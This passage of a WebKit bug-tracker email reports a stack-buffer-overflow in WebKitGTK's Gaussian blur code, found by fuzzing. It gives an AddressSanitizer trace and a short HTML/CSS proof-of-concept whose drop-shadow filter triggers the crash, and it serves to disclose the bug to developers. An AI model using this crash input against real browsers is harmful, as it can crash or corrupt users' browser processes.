#20 0x7f4c07912bd1 in decltype(auto) std::__apply_impl<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>, 0ul, 1ul>(WebKit::WebProcess&&, WebKit::WebProcess&&, std::integer_sequence<unsigned long, 0ul, 1ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1854:14
#21 0x7f4c07912bd1 in decltype(auto) std::apply<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess&&, WebKit::WebProcess&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1865:14
#22 0x7f4c07912bd1 in void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:134:5
#23 0x7f4c07912bd1 in void IPC::handleMessage<Messages::WebProcess::CreateWebPage, WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&)>(IPC::Connection&, IPC::Decoder&, WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&)) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:236:9
#24 0x7f4c07912bd1 in WebKit::WebProcess::didReceiveWebProcessMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/DerivedSources/WebKit/WebProcessMessageReceiver.cpp:122:16
#25 0x7f4c08c93deb in WebKit::WebProcess::didReceiveMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:932:9
#26 0x7f4c0831fee0 in IPC::Connection::dispatchMessage(IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1233:15
#27 0x7f4c083204a5 in IPC::Connection::dispatchMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1281:9
#28 0x7f4c08320cb6 in IPC::Connection::dispatchOneIncomingMessage() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1346:5
#29 0x7f4c0832338f in IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1195:28
#30 0x7f4c0832338f in WTF::Detail::CallableWrapper<IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39
#31 0x7f4c0499d4a9 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35
#32 0x7f4c0499d4a9 in WTF::RunLoop::performWork() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:147:9
#33 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:80:42
#34 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:79:43
#35 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28
#36 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5
#37 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&)
Shadow bytes around the buggy address:
0x0fe9f651cd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe9f651cd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe9f651cd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe9f651cd90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe9f651cda0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe9f651cdb0: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00[04]f2 f2
0x0fe9f651cdc0: f2 f2 00 f2 f2 f2 00 00 00 f2 f2 f2 f2 f2 00 00
0x0fe9f651cdd0: 00 f2 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
0x0fe9f651cde0: f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8
0x0fe9f651cdf0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f3 f3 f3 f3 f3 f3
0x0fe9f651ce00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==237950==ABORTING
```
1. Proof-of-Concept
```cpp
<style>
.class2 {
-webkit-filter: blur(0em) drop-shadow(91px 36px 1024em black);
}
x48,.class0:read-only {
border-style: groove outset outset hidden;
}
*:nth-child(odd) {
display: block table;
}
style {
-webkit-animation: keyframes2,keyframes3 0.5s steps(454),ease-out alternate-reverse,normal both;
}
@keyframes keyframes3 {
40% { -webkit-transform: scaleX(43) }
}
</style>
<a id="x56" ping="x" draggable="true" class="class2" translate="yes" itemtype="AAAAAAAA" charset="UTF-16" contextmenu="foo" slot="foo" webkitdropzone="copy" onfocus="f3()">
<image id="x21" tabindex="-1" preserveAspectRatio="xMaxYMax" buffered-rendering="dynamic" class="class0" paint-order="stroke markers" width="0px" vector-effect="non-scaling-stroke" clip="rect(auto,0px,auto,auto)" transform="rotate(180deg) translate(100%,284em)" x="16%">
```
1. Software Download Link
a. https://webkitgtk.org/
--
You are receiving this mail because:
You are the assignee for the bug.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webkit.org/pipermail/webkit-unassigned/attachments/20231201/df548985/attachment-0001.htm>
More information about the webkit-unassigned
mailing list